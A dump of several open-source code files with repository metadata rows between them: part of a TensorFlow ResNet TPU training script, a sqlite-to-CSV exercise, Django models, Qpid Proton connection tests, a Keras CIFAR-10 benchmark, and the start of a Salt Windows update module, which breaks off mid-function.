host_call = (host_call_fn, [gs_t, loss_t, lr_t, ce_t])
else:
train_op = None
eval_metrics = None
if mode == tf.estimator.ModeKeys.EVAL:
def metric_fn(labels, logits):
"""Evaluation metric function. Evaluates accuracy.
This function is executed on the CPU and should not directly reference
any Tensors in the rest of the `model_fn`. To pass Tensors from the model
to the `metric_fn`, provide as part of the `eval_metrics`. See
https://www.tensorflow.org/api_docs/python/tf/estimator/tpu/TPUEstimatorSpec
for more information.
Arguments should match the list of `Tensor` objects passed as the second
element in the tuple passed to `eval_metrics`.
Args:
labels: `Tensor` with shape `[batch]`.
logits: `Tensor` with shape `[batch, num_classes]`.
Returns:
A dict of the metrics to return from evaluation.
"""
predictions = tf.argmax(logits, axis=1)
top_1_accuracy = tf.metrics.accuracy(labels, predictions)
in_top_5 = tf.cast(tf.nn.in_top_k(logits, labels, 5), tf.float32)
top_5_accuracy = tf.metrics.mean(in_top_5)
return {
'top_1_accuracy': top_1_accuracy,
'top_5_accuracy': top_5_accuracy,
}
eval_metrics = (metric_fn, [labels, logits])
return tf.estimator.tpu.TPUEstimatorSpec(
mode=mode,
loss=loss,
train_op=train_op,
host_call=host_call,
eval_metrics=eval_metrics)
def _verify_non_empty_string(value, field_name):
"""Ensures that a given proposed field value is a non-empty string.
Args:
value: proposed value for the field.
field_name: string name of the field, e.g. `project`.
Returns:
The given value, provided that it passed the checks.
Raises:
ValueError: the value is not a string, or is a blank string.
"""
if not isinstance(value, str):
raise ValueError(
'Bigtable parameter "%s" must be a string.' % field_name)
if not value:
raise ValueError(
'Bigtable parameter "%s" must be non-empty.' % field_name)
return value
def _select_tables_from_flags():
"""Construct training and evaluation Bigtable selections from flags.
Returns:
[training_selection, evaluation_selection]
"""
project = _verify_non_empty_string(
FLAGS.bigtable_project or FLAGS.gcp_project,
'project')
instance = _verify_non_empty_string(FLAGS.bigtable_instance, 'instance')
table = _verify_non_empty_string(FLAGS.bigtable_table, 'table')
train_prefix = _verify_non_empty_string(FLAGS.bigtable_train_prefix,
'train_prefix')
eval_prefix = _verify_non_empty_string(FLAGS.bigtable_eval_prefix,
'eval_prefix')
column_family = _verify_non_empty_string(FLAGS.bigtable_column_family,
'column_family')
column_qualifier = _verify_non_empty_string(FLAGS.bigtable_column_qualifier,
'column_qualifier')
return [ # pylint: disable=g-complex-comprehension
imagenet_input.BigtableSelection(
project=project,
instance=instance,
table=table,
prefix=p,
column_family=column_family,
column_qualifier=column_qualifier)
for p in (train_prefix, eval_prefix)
]
def main(unused_argv):
params = params_dict.ParamsDict(
resnet_config.RESNET_CFG, resnet_config.RESNET_RESTRICTIONS)
params = params_dict.override_params_dict(
params, FLAGS.config_file, is_strict=True)
params = params_dict.override_params_dict(
params, FLAGS.params_override, is_strict=True)
params = flags_to_params.override_params_from_input_flags(params, FLAGS)
params.validate()
params.lock()
tpu_cluster_resolver = tf.distribute.cluster_resolver.TPUClusterResolver(
FLAGS.tpu if (FLAGS.tpu or params.use_tpu) else '',
zone=FLAGS.tpu_zone,
project=FLAGS.gcp_project)
if params.use_async_checkpointing:
save_checkpoints_steps = None
else:
save_checkpoints_steps = max(5000, params.iterations_per_loop)
config = tf.estimator.tpu.RunConfig(
cluster=tpu_cluster_resolver,
model_dir=FLAGS.model_dir,
save_checkpoints_steps=save_checkpoints_steps,
log_step_count_steps=FLAGS.log_step_count_steps,
session_config=tf.ConfigProto(
graph_options=tf.GraphOptions(
rewrite_options=rewriter_config_pb2.RewriterConfig(
disable_meta_optimizer=True))),
tpu_config=tf.estimator.tpu.TPUConfig(
iterations_per_loop=params.iterations_per_loop,
num_shards=params.num_cores,
per_host_input_for_training=tf.estimator.tpu.InputPipelineConfig
.PER_HOST_V2)) # pylint: disable=line-too-long
resnet_classifier = tf.estimator.tpu.TPUEstimator(
use_tpu=params.use_tpu,
model_fn=resnet_model_fn,
config=config,
params=params.as_dict(),
train_batch_size=params.train_batch_size,
eval_batch_size=params.eval_batch_size,
export_to_tpu=FLAGS.export_to_tpu)
assert (params.precision == 'bfloat16' or
params.precision == 'float32'), (
'Invalid value for precision parameter; '
'must be bfloat16 or float32.')
tf.logging.info('Precision: %s', params.precision)
use_bfloat16 = params.precision == 'bfloat16'
# Input pipelines are slightly different (with regards to shuffling and
# preprocessing) between training and evaluation.
if FLAGS.bigtable_instance:
tf.logging.info('Using Bigtable dataset, table %s', FLAGS.bigtable_table)
select_train, select_eval = _select_tables_from_flags()
imagenet_train, imagenet_eval = [
imagenet_input.ImageNetBigtableInput( # pylint: disable=g-complex-comprehension
is_training=is_training,
use_bfloat16=use_bfloat16,
transpose_input=params.transpose_input,
selection=selection,
augment_name=FLAGS.augment_name,
randaug_num_layers=FLAGS.randaug_num_layers,
randaug_magnitude=FLAGS.randaug_magnitude)
for (is_training, selection) in [(True,
select_train), (False, select_eval)]
]
else:
if FLAGS.data_dir == FAKE_DATA_DIR:
tf.logging.info('Using fake dataset.')
else:
tf.logging.info('Using dataset: %s', FLAGS.data_dir)
imagenet_train, imagenet_eval = [
imagenet_input.ImageNetInput( # pylint: disable=g-complex-comprehension
is_training=is_training,
data_dir=FLAGS.data_dir,
transpose_input=params.transpose_input,
cache=params.use_cache and is_training,
image_size=params.image_size,
num_parallel_calls=params.num_parallel_calls,
include_background_label=(params.num_label_classes == 1001),
use_bfloat16=use_bfloat16,
augment_name=FLAGS.augment_name,
randaug_num_layers=FLAGS.randaug_num_layers,
randaug_magnitude=FLAGS.randaug_magnitude)
for is_training in [True, False]
]
steps_per_epoch = params.num_train_images // params.train_batch_size
eval_steps = params.num_eval_images // params.eval_batch_size
if FLAGS.mode == 'eval':
# Run evaluation when there's a new checkpoint
for ckpt in tf.train.checkpoints_iterator(
FLAGS.model_dir, timeout=FLAGS.eval_timeout):
tf.logging.info('Starting to evaluate.')
try:
start_timestamp = time.time() # This time will include compilation time
eval_results = resnet_classifier.evaluate(
input_fn=imagenet_eval.input_fn,
steps=eval_steps,
checkpoint_path=ckpt)
elapsed_time = int(time.time() - start_timestamp)
tf.logging.info('Eval results: %s. Elapsed seconds: %d',
eval_results, elapsed_time)
# Terminate eval job when final checkpoint is reached
current_step = int(os.path.basename(ckpt).split('-')[1])
if current_step >= params.train_steps:
tf.logging.info(
'Evaluation finished after training step %d', current_step)
break
except tf.errors.NotFoundError:
# Since the coordinator is on a different job than the TPU worker,
# sometimes the TPU worker does not finish initializing until long after
# the CPU job tells it to start evaluating. In this case, the checkpoint
# file could have been deleted already.
tf.logging.info(
'Checkpoint %s no longer exists, skipping checkpoint', ckpt)
else: # FLAGS.mode == 'train' or FLAGS.mode == 'train_and_eval'
try:
current_step = tf.train.load_variable(FLAGS.model_dir,
tf.GraphKeys.GLOBAL_STEP)
except (TypeError, ValueError, tf.errors.NotFoundError):
current_step = 0
steps_per_epoch = params.num_train_images // params.train_batch_size
tf.logging.info('Training for %d steps (%.2f epochs in total). Current'
' step %d.',
params.train_steps,
params.train_steps / steps_per_epoch,
current_step)
start_timestamp = time.time() # This time will include compilation time
if FLAGS.mode == 'train':
hooks = []
if params.use_async_checkpointing:
try:
from tensorflow.contrib.tpu.python.tpu import async_checkpoint # pylint: disable=g-import-not-at-top
except ImportError as e:
logging.exception(
'Async checkpointing is not supported in TensorFlow 2.x')
raise e
hooks.append(
async_checkpoint.AsyncCheckpointSaverHook(
checkpoint_dir=FLAGS.model_dir,
save_steps=max(5000, params.iterations_per_loop)))
if FLAGS.profile_every_n_steps > 0:
hooks.append(
tpu_profiler_hook.TPUProfilerHook(
save_steps=FLAGS.profile_every_n_steps,
output_dir=FLAGS.model_dir, tpu=FLAGS.tpu)
)
resnet_classifier.train(
input_fn=imagenet_train.input_fn,
max_steps=params.train_steps,
hooks=hooks)
else:
assert FLAGS.mode == 'train_and_eval'
while current_step < params.train_steps:
# Train for up to steps_per_eval number of steps.
# At the end of training, a checkpoint will be written to --model_dir.
next_checkpoint = min(current_step + FLAGS.steps_per_eval,
params.train_steps)
resnet_classifier.train(
input_fn=imagenet_train.input_fn, max_steps=next_checkpoint)
current_step = next_checkpoint
tf.logging.info('Finished training up to step %d. Elapsed seconds %d.',
next_checkpoint, int(time.time() - start_timestamp))
# Evaluate the model on the most recent model in --model_dir.
# Since evaluation happens in batches of --eval_batch_size, some images
# may be excluded modulo the batch size. As long as the batch size is
# consistent, the evaluated images are also consistent.
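# For example (illustrative numbers): with 50000 eval images and
# --eval_batch_size=1024, evaluation runs 50000 // 1024 = 48 steps and
# covers 48 * 1024 = 49152 images; the remaining 848 images are skipped.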
tf.logging.info('Starting to evaluate.')
eval_results = resnet_classifier.evaluate(
input_fn=imagenet_eval.input_fn,
steps=params.num_eval_images // params.eval_batch_size)
tf.logging.info('Eval results at step %d: %s',
next_checkpoint, eval_results)
elapsed_time = int(time.time() - start_timestamp)
tf.logging.info('Finished training up to step %d. Elapsed seconds %d.',
params.train_steps, elapsed_time)
if FLAGS.export_dir is not None:
# The guide to serving an exported TensorFlow model is at:
# https://www.tensorflow.org/serving/serving_basic
tf.logging.info('Starting to export model.')
export_path = resnet_classifier.export_saved_model(
export_dir_base=FLAGS.export_dir,
serving_input_receiver_fn=imagenet_input.image_serving_input_fn)
if FLAGS.add_warmup_requests:
inference_warmup.write_warmup_requests(
export_path,
FLAGS.model_name,
params.image_size,
batch_sizes=FLAGS.inference_batch_sizes,
image_format='JPEG')
if __name__ == '__main__':
tf.logging.set_verbosity(tf.logging.INFO)
tf.disable_v2_behavior()
app.run(main)
| 40.240994
| 111
| 0.683522
|
794e28c692faff4e7f74b6a5dd0f2cb2b30ea916
| 528
|
py
|
Python
|
Programming Languages/Python/Theory/100_Python_Exercises/Exercises/Exercise 90/90.py
|
jaswinder9051998/Resources
|
fd468af37bf24ca57555d153ee64693c018e822e
|
[
"MIT"
] | 101
|
2021-12-20T11:57:11.000Z
|
2022-03-23T09:49:13.000Z
|
Programming Languages/Python/Theory/100_Python_Exercises/Exercises/Exercise 90/90.py
|
jaswinder9051998/Resources
|
fd468af37bf24ca57555d153ee64693c018e822e
|
[
"MIT"
] | 4
|
2022-01-12T11:55:56.000Z
|
2022-02-12T04:53:33.000Z
|
Programming Languages/Python/Theory/100_Python_Exercises/Exercises/Exercise 90/90.py
|
jaswinder9051998/Resources
|
fd468af37bf24ca57555d153ee64693c018e822e
|
[
"MIT"
] | 38
|
2022-01-12T11:56:16.000Z
|
2022-03-23T10:07:52.000Z
|
#Please download the database file database.db and use Python to access the database table rows that have an area of 2,000,000 or greater. Then export those rows to a CSV file
import sqlite3
import pandas
conn = sqlite3.connect("database.db")
cur = conn.cursor()
cur.execute("SELECT * FROM countries WHERE area >= 2000000")
rows = cur.fetchall()
conn.close()
print(rows)
df = pandas.DataFrame.from_records(rows)
df.columns =["Rank", "Country", "Area", "Population"]
print(df)
df.to_csv("countries_big_area.csv", index=False)
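# A shorter variant of the same task (a sketch, not part of the original
# exercise) would let pandas issue the query directly while the connection is
# still open, e.g.:
#   df = pandas.read_sql_query(
#       "SELECT * FROM countries WHERE area >= 2000000", conn)
#   df.to_csv("countries_big_area.csv", index=False)
# In that case the column names come from the table itself instead of being
# assigned by hand.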
| 31.058824
| 175
| 0.751894
|
794e28e18a2e33ce9a76e4fc75fa3ac36954d757
| 532
|
py
|
Python
|
class_based_views/django1/django1/web/models.py
|
Nikoletazl/Web-Framework
|
a04372a305797a84cdbccde13a1e47da8d551ea3
|
[
"MIT"
] | null | null | null |
class_based_views/django1/django1/web/models.py
|
Nikoletazl/Web-Framework
|
a04372a305797a84cdbccde13a1e47da8d551ea3
|
[
"MIT"
] | null | null | null |
class_based_views/django1/django1/web/models.py
|
Nikoletazl/Web-Framework
|
a04372a305797a84cdbccde13a1e47da8d551ea3
|
[
"MIT"
] | null | null | null |
from django.db import models
class Category(models.Model):
NAME_MAX_LEN = 15
name = models.CharField(
max_length=NAME_MAX_LEN,
)
def __str__(self):
return self.name
class Todo(models.Model):
TITLE_MAX_LEN = 24
title = models.CharField(
max_length=TITLE_MAX_LEN,
)
description = models.TextField()
category = models.ForeignKey(
Category,
on_delete=models.CASCADE,
)
def __str__(self):
return self.title
| 17.733333
| 37
| 0.597744
|
794e29bdd3bf64fb8d3473036f9efbc36cbf307a
| 6,271
|
py
|
Python
|
python/tests/proton_tests/connect.py
|
josusky/qpid-proton
|
122355ab5eeed05c7fe1169653387afb1c9fdd95
|
[
"Apache-2.0"
] | 1
|
2021-01-20T16:04:42.000Z
|
2021-01-20T16:04:42.000Z
|
python/tests/proton_tests/connect.py
|
francescoraves483/qpid-proton
|
3eb62f51815602c86cdf0112f1154f9e29883774
|
[
"Apache-2.0"
] | 33
|
2021-04-27T21:40:31.000Z
|
2021-06-30T17:52:17.000Z
|
python/tests/proton_tests/connect.py
|
francescoraves483/qpid-proton
|
3eb62f51815602c86cdf0112f1154f9e29883774
|
[
"Apache-2.0"
] | 2
|
2021-01-28T17:42:06.000Z
|
2021-05-14T08:08:13.000Z
|
from __future__ import absolute_import
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import time
import sys
import json
from .common import Test, SkipTest, TestServer, free_tcp_port, ensureCanTestExtendedSASL
from proton import SSLDomain
from proton.reactor import Container
from proton.handlers import MessagingHandler
from .ssl import _testpath
def write_connect_conf(obj):
with open('connect.json', 'w') as outfile:
json.dump(obj, outfile)
class Server(MessagingHandler):
def __init__(self, expected_user=None, scheme='amqps'):
super(Server, self).__init__()
self.port = free_tcp_port()
self.scheme = scheme
self.url = '%s://localhost:%i' % (self.scheme, self.port)
self.expected_user = expected_user
self.verified_user = False
def on_start(self, event):
self.listener = event.container.listen(self.url)
def on_connection_opening(self, event):
if self.expected_user:
assert event.connection.transport.user == self.expected_user
self.verified_user = True
def on_connection_closing(self, event):
event.connection.close()
self.listener.close()
class Client(MessagingHandler):
def __init__(self):
super(Client, self).__init__()
self.opened = False
def on_connection_opened(self, event):
self.opened = True
event.connection.close()
class ConnectConfigTest(Test):
def test_port(self):
ensureCanTestExtendedSASL()
server = Server()
container = Container(server)
client = Client()
write_connect_conf({'port':server.port})
container.connect(handler=client, reconnect=False)
container.run()
assert client.opened == True
def test_user(self):
ensureCanTestExtendedSASL()
user = 'user@proton'
password = 'password'
server = Server(user)
container = Container(server)
client = Client()
write_connect_conf({'port':server.port, 'user':user, 'password':password})
container.connect(handler=client, reconnect=False)
container.run()
assert client.opened == True
assert server.verified_user == True
def test_ssl(self):
ensureCanTestExtendedSASL()
server = Server(scheme='amqps')
container = Container(server)
container.ssl.server.set_credentials(_testpath('server-certificate.pem'),
_testpath('server-private-key.pem'),
'server-password')
client = Client()
config = {
'scheme':'amqps',
'port':server.port,
'tls': {
'verify': False
}
}
write_connect_conf(config)
container.connect(handler=client, reconnect=False)
container.run()
assert client.opened == True
def test_ssl_external(self):
ensureCanTestExtendedSASL()
server = Server(scheme='amqps')
container = Container(server)
container.ssl.server.set_credentials(_testpath('server-certificate-lh.pem'),
_testpath('server-private-key-lh.pem'),
'server-password')
container.ssl.server.set_trusted_ca_db(_testpath('ca-certificate.pem'))
container.ssl.server.set_peer_authentication( SSLDomain.VERIFY_PEER,
_testpath('ca-certificate.pem') )
client = Client()
config = {
'scheme':'amqps',
'port':server.port,
'sasl': {
'mechanisms': 'EXTERNAL'
},
'tls': {
'cert': _testpath('client-certificate.pem'),
'key': _testpath('client-private-key-no-password.pem'),
'ca': _testpath('ca-certificate.pem'),
'verify': True
}
}
write_connect_conf(config)
container.connect(handler=client, reconnect=False)
container.run()
assert client.opened == True
def test_ssl_plain(self):
ensureCanTestExtendedSASL()
user = 'user@proton'
password = 'password'
server = Server(expected_user=user, scheme='amqps')
container = Container(server)
container.ssl.server.set_credentials(_testpath('server-certificate-lh.pem'),
_testpath('server-private-key-lh.pem'),
'server-password')
container.ssl.server.set_trusted_ca_db(_testpath('ca-certificate.pem'))
container.ssl.server.set_peer_authentication( SSLDomain.VERIFY_PEER,
_testpath('ca-certificate.pem') )
client = Client()
config = {
'scheme':'amqps',
'port':server.port,
'user':user,
'password':password,
'sasl': {
'mechanisms': 'PLAIN'
},
'tls': {
'cert': _testpath('client-certificate.pem'),
'key': _testpath('client-private-key-no-password.pem'),
'ca': _testpath('ca-certificate.pem'),
'verify': True
}
}
write_connect_conf(config)
container.connect(handler=client, reconnect=False)
container.run()
assert client.opened == True
| 36.459302
| 88
| 0.595918
|
794e2a6ff600c50d422e4645444f728365a478d7
| 5,304
|
py
|
Python
|
keras/benchmarks/keras_examples_benchmarks/cifar10_cnn_benchmark_test.py
|
winnerineast/keras
|
1e94c43d7ba0d7b6b629b2300e40470f495bdbe0
|
[
"Apache-2.0"
] | null | null | null |
keras/benchmarks/keras_examples_benchmarks/cifar10_cnn_benchmark_test.py
|
winnerineast/keras
|
1e94c43d7ba0d7b6b629b2300e40470f495bdbe0
|
[
"Apache-2.0"
] | null | null | null |
keras/benchmarks/keras_examples_benchmarks/cifar10_cnn_benchmark_test.py
|
winnerineast/keras
|
1e94c43d7ba0d7b6b629b2300e40470f495bdbe0
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Benchmarks on CNN on cifar10 dataset."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from keras.benchmarks import benchmark_util
class Cifar10CNNBenchmark(tf.test.Benchmark):
"""Benchmarks for CNN using `tf.test.Benchmark`."""
def __init__(self):
super(Cifar10CNNBenchmark, self).__init__()
self.num_classes = 10
(self.x_train, self.y_train), _ = tf.keras.datasets.cifar10.load_data()
self.x_train = self.x_train.astype('float32') / 255
self.y_train = tf.keras.utils.to_categorical(self.y_train, self.num_classes)
self.epochs = 5
def _build_model(self):
"""Model from https://github.com/keras-team/keras/blob/master/examples/cifar10_cnn.py."""
model = tf.keras.Sequential()
model.add(
tf.keras.layers.Conv2D(
32, (3, 3), padding='same', input_shape=self.x_train.shape[1:]))
model.add(tf.keras.layers.Activation('relu'))
model.add(tf.keras.layers.Conv2D(32, (3, 3)))
model.add(tf.keras.layers.Activation('relu'))
model.add(tf.keras.layers.MaxPooling2D(pool_size=(2, 2)))
model.add(tf.keras.layers.Dropout(0.25))
model.add(tf.keras.layers.Conv2D(64, (3, 3), padding='same'))
model.add(tf.keras.layers.Activation('relu'))
model.add(tf.keras.layers.Conv2D(64, (3, 3)))
model.add(tf.keras.layers.Activation('relu'))
model.add(tf.keras.layers.MaxPooling2D(pool_size=(2, 2)))
model.add(tf.keras.layers.Dropout(0.25))
model.add(tf.keras.layers.Flatten())
model.add(tf.keras.layers.Dense(512))
model.add(tf.keras.layers.Activation('relu'))
model.add(tf.keras.layers.Dropout(0.5))
model.add(tf.keras.layers.Dense(self.num_classes))
model.add(tf.keras.layers.Activation('softmax'))
return model
# In each benchmark test, the required arguments for the
# method `measure_performance` include:
# x: Input data, it could be Numpy or loaded from tfds.
# y: Target data. If `x` is a dataset or generator instance,
# `y` should not be specified.
# loss: Loss function for model.
# optimizer: Optimizer for model.
# Check more details in `measure_performance()` method of
# benchmark_util.
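# A minimal sketch of such a call, mirroring the benchmark methods below
# (the batch size and epoch count here are illustrative, not values used by
# this file):
#   metrics, wall_time, extras = benchmark_util.measure_performance(
#       self._build_model,
#       x=self.x_train,
#       y=self.y_train,
#       batch_size=128,
#       epochs=1,
#       optimizer=tf.keras.optimizers.RMSprop(learning_rate=0.0001),
#       loss='categorical_crossentropy',
#       metrics=['accuracy'])
#   self.report_benchmark(wall_time=wall_time, metrics=metrics, extras=extras)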
def benchmark_cnn_cifar10_bs_256(self):
"""Measure performance with batch_size=256."""
batch_size = 256
metrics, wall_time, extras = benchmark_util.measure_performance(
self._build_model,
x=self.x_train,
y=self.y_train,
batch_size=batch_size,
epochs=self.epochs,
optimizer=tf.keras.optimizers.RMSprop(learning_rate=0.0001, decay=1e-6),
loss='categorical_crossentropy',
metrics=['accuracy'])
self.report_benchmark(wall_time=wall_time, metrics=metrics, extras=extras)
def benchmark_cnn_cifar10_bs_512(self):
"""Measure performance with batch_size=512."""
batch_size = 512
metrics, wall_time, extras = benchmark_util.measure_performance(
self._build_model,
x=self.x_train,
y=self.y_train,
batch_size=batch_size,
epochs=self.epochs,
optimizer=tf.keras.optimizers.RMSprop(learning_rate=0.0001, decay=1e-6),
loss='categorical_crossentropy',
metrics=['accuracy'])
self.report_benchmark(wall_time=wall_time, metrics=metrics, extras=extras)
def benchmark_cnn_cifar10_bs_1024(self):
"""Measure performance with batch_size=1024."""
batch_size = 1024
metrics, wall_time, extras = benchmark_util.measure_performance(
self._build_model,
x=self.x_train,
y=self.y_train,
batch_size=batch_size,
epochs=self.epochs,
optimizer=tf.keras.optimizers.RMSprop(learning_rate=0.0001, decay=1e-6),
loss='categorical_crossentropy',
metrics=['accuracy'])
self.report_benchmark(wall_time=wall_time, metrics=metrics, extras=extras)
def benchmark_cnn_cifar10_bs_1024_gpu_2(self):
"""Measure performance with batch_size=1024, gpu=2 and
distribution_strategy=`mirrored`.
"""
batch_size = 1024
metrics, wall_time, extras = benchmark_util.measure_performance(
self._build_model,
x=self.x_train,
y=self.y_train,
batch_size=batch_size,
num_gpus=2,
distribution_strategy='mirrored',
epochs=self.epochs,
optimizer=tf.keras.optimizers.RMSprop(learning_rate=0.0001, decay=1e-6),
loss='categorical_crossentropy',
metrics=['accuracy'])
self.report_benchmark(wall_time=wall_time, metrics=metrics, extras=extras)
if __name__ == '__main__':
tf.test.main()
| 37.885714
| 93
| 0.692119
|
794e2abf5a24b34430ae8b54c3049bd20f1ea8b1
| 22,152
|
py
|
Python
|
salt/modules/win_update.py
|
skrobul/salt
|
ef7fb71082cce7a9783e00b9c65062fefae09263
|
[
"Apache-2.0"
] | null | null | null |
salt/modules/win_update.py
|
skrobul/salt
|
ef7fb71082cce7a9783e00b9c65062fefae09263
|
[
"Apache-2.0"
] | null | null | null |
salt/modules/win_update.py
|
skrobul/salt
|
ef7fb71082cce7a9783e00b9c65062fefae09263
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
'''
Module for running windows updates.
:depends: - win32com
- win32con
- win32api
- pywintypes
.. versionadded: (Helium)
'''
# Import Python libs
import logging
try:
import win32com.client
import pythoncom
HAS_DEPENDENCIES = True
except ImportError:
HAS_DEPENDENCIES = False
import salt.utils
log = logging.getLogger(__name__)
def __virtual__():
'''
Only works on Windows systems
'''
if salt.utils.is_windows() and HAS_DEPENDENCIES:
return True
return False
def _gather_update_categories(updateCollection):
'''
this is a convenience method to gather the categories of updates that are
available in any update collection it is passed. Typically, that is the
download_collection.
Some known categories:
Updates
Windows 7
Critical Updates
Security Updates
Update Rollups
'''
categories = []
for i in range(updateCollection.Count):
update = updateCollection.Item(i)
for j in range(update.Categories.Count):
name = update.Categories.Item(j).Name
if name not in categories:
log.debug('found category: {0}'.format(name))
categories.append(name)
return categories
class PyWinUpdater(object):
def __init__(self, categories=None, skipUI=True, skipDownloaded=True,
skipInstalled=True, skipReboot=False, skipPresent=True,
softwareUpdates=True, driverUpdates=False, skipHidden=True):
log.debug('CoInitializing the pycom system')
pythoncom.CoInitialize()
self.skipUI = skipUI
self.skipDownloaded = skipDownloaded
self.skipInstalled = skipInstalled
self.skipReboot = skipReboot
self.skipPresent = skipPresent
self.skipHidden = skipHidden
self.softwareUpdates = softwareUpdates
self.driverUpdates = driverUpdates
#the list of categories that the user wants to be searched for.
self.categories = categories
#the list of categories that are present in the updates found.
self.foundCategories = []
#careful not to get those two confused.
log.debug('dispatching update_session to keep the session object.')
self.update_session = win32com.client.Dispatch('Microsoft.Update.Session')
log.debug('update_session got. Now creating a win_searcher to seek out the updates')
self.win_searcher = self.update_session.CreateUpdateSearcher()
#list of updates that are applicable by current settings.
self.download_collection = win32com.client.Dispatch('Microsoft.Update.UpdateColl')
#list of updates to be installed.
self.install_collection = win32com.client.Dispatch('Microsoft.Update.UpdateColl')
#the object responsible for fetching the actual downloads.
self.win_downloader = self.update_session.CreateUpdateDownloader()
self.win_downloader.Updates = self.download_collection
#the object responsible for the installing of the updates.
self.win_installer = self.update_session.CreateUpdateInstaller()
self.win_installer.Updates = self.install_collection
#the results of the download process
self.download_results = None
#the results of the installation process
self.install_results = None
def Search(self, searchString):
try:
log.debug('beginning search of the passed string: {0}'.format(searchString))
self.search_results = self.win_searcher.Search(searchString)
log.debug('search completed successfully.')
except Exception as e:
log.info('search for updates failed. {0}'.format(str(e)))
return e
log.debug('parsing results. {0} updates were found.'.format(
str(self.search_results.Updates.Count)))
try:
#step through the list of the updates to ensure that the updates match the
# features desired.
for update in self.search_results.Updates:
#this skips an update if UI (user-input) updates are not desired.
if update.InstallationBehavior.CanRequestUserInput:
log.debug('Skipped update {0}'.format(str(update)))
continue
#if this update is already downloaded, it doesn't need to be in
# the download_collection, so skip it unless the user mandates a redownload.
if self.skipDownloaded and update.IsDownloaded:
continue
#check this update's categories against the ones desired.
for category in update.Categories:
#this is a zero guard. these tests have to be in this order
# or it will error out when the user tries to search for
# updates without specifying categories.
if self.categories is None or category.Name in self.categories:
#adds it to the list to be downloaded.
self.download_collection.Add(update)
log.debug('added update {0}'.format(str(update)))
#every update has 2 categories. this prevents the update
#from being added twice.
break
log.debug('download_collection made. gathering found categories.')
#gets the categories of the updates available in this collection of updates
self.foundCategories = _gather_update_categories(self.download_collection)
log.debug('found categories: {0}'.format(str(self.foundCategories)))
return True
except Exception as e:
log.info('parsing updates failed. {0}'.format(str(e)))
return e
def AutoSearch(self):
'''
this function generates a search string, simplifying the search function while
still providing as many features as possible.
'''
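#Example: with the default constructor flags above (skipInstalled, skipHidden
#and skipPresent True, skipReboot False, softwareUpdates True, driverUpdates
#False), the generated string is:
#"IsInstalled=0 and IsHidden=0 and RebootRequired=0 and IsPresent=0 and Type='Software'"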
search_string = ''
searchParams = []
if self.skipInstalled:
searchParams.append('IsInstalled=0')
else:
searchParams.append('IsInstalled=1')
if self.skipHidden:
searchParams.append('IsHidden=0')
else:
searchParams.append('IsHidden=1')
if self.skipReboot:
searchParams.append('RebootRequired=1')
else:
searchParams.append('RebootRequired=0')
if self.skipPresent:
searchParams.append('IsPresent=0')
else:
searchParams.append('IsPresent=1')
if len(searchParams) > 1:
for i in searchParams:
search_string += '{0} and '.format(i)
else:
search_string += '{0} and '.format(searchParams[0])
if self.softwareUpdates and self.driverUpdates:
search_string += 'Type=\'Software\' or Type=\'Driver\''
elif self.softwareUpdates:
search_string += 'Type=\'Software\''
elif self.driverUpdates:
search_string += 'Type=\'Driver\''
else:
return False
#if there is no type, there is nothing to search.
log.debug('generated search string: {0}'.format(search_string))
return self.Search(search_string)
def Download(self):
#chase the download_collection! do the actual download process.
try:
#if the download_collection is empty, no need to download things.
if self.download_collection.Count != 0:
self.download_results = self.win_downloader.Download()
else:
log.debug('Skipped downloading, all updates were already cached.')
return True
except Exception as e:
log.debug('failed in the downloading {0}.'.format(str(e)))
return e
def Install(self):
#beat those updates into place!
try:
#this does not draw from the download_collection. important thing to know.
#the blugger is created regardless of what the download_collection has done, but it
#will only install those updates which have already been downloaded and are ready.
for update in self.search_results.Updates:
if update.IsDownloaded:
self.install_collection.Add(update)
log.debug('Updates prepared. beginning installation')
except Exception as e:
log.info('Preparing install list failed: {0}'.format(str(e)))
return e
#if the blugger is empty, there is no point in starting the install process.
if self.install_collection.Count != 0:
log.debug('Install list created, about to install')
updates = []
try:
#the call to install.
self.install_results = self.win_installer.Install()
log.info('Installation of updates complete')
return True
except Exception as e:
log.info('Installation failed: {0}'.format(str(e)))
return e
else:
log.info('no new updates.')
return True
def GetInstallationResults(self):
'''
this gets the results of the installation process.
'''
#if the blugger is empty, the results are nil.
log.debug('blugger has {0} updates in it'.format(str(self.install_collection.Count)))
if self.install_collection.Count == 0:
return {}
updates = []
log.debug('preparing update list')
for i in range(self.install_collection.Count):
#this gets the result from install_results, but the title comes from the update
#collection install_collection.
updates.append('{0}: {1}'.format(
str(self.install_results.GetUpdateResult(i).ResultCode),
str(self.install_collection.Item(i).Title)))
log.debug('Update results enumerated, now making a dictionary to pass back')
results = {}
#translates the list of update results into a dictionary that salt expects.
for i, update in enumerate(updates):
results['update {0}'.format(i)] = update
log.debug('Update information compiled. returning')
return results
def GetInstallationResultsPretty(self):
'''
converts the installation results into a pretty print.
'''
updates = self.GetInstallationResults()
ret = 'The following are the updates and their return codes.\n'
for i in updates.keys():
#each entry is already formatted as 'ResultCode: Title' by GetInstallationResults.
ret += '\t{0}\n'.format(str(updates[i]))
return ret
def GetDownloadResults(self):
updates = []
for i in range(self.download_collection.Count):
updates.append('{0}: {1}'.format(
str(self.download_results.GetUpdateResult(i).ResultCode),
str(self.download_collection.Item(i).Title)))
results = {}
for i, update in enumerate(updates):
results['update {0}'.format(i)] = update
return results
def GetSearchResults(self):
updates = []
log.debug('parsing results. {0} updates were found.'.format(
str(self.download_collection.count)))
for update in self.download_collection:
